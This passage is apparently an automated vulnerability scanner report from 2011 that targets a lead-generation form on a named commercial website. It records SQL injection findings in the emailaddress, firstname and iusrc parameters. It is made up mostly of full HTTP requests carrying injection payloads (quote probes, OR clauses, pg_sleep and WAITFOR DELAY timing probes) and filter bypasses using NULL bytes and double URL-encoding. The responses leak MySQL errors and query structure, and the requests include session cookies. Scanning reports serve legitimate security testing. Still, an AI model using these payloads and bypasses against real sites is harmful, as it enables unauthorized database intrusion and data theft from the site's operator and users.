OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:04 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:27:02 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email''&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:27:03 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The emailaddress parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the emailaddress parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:08 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7238 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5
The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email%00'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:13 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=07qmhv62qk4sfsmmd3lokt8pq3; path=/ Content-Length: 7326 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email.'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email%00''&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:13 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=auj3frr0jt73ukricb4ad3sh47; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name'&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:15 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7238 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name''&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:15 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name%00'&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:16 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=qctcj0a152pjob7p70nk4omht7; path=/ Content-Length: 7326 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name.'&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name%00''&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:16 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=q0msgr7v0la2s91som68sjs086; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc%2527&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:00:38 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7254 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc%27&address=Address&attributeId_342_g=2017__Accounting/Finance&att' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc%2527%2527&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:00:38 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
